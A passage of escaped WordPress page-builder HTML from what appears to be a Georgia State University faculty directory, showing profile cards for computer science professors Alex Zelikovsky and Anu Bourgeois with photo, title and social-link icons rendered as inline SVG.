20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://publichealth.gsu.edu/profile/susie-ramisetty-mikler/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 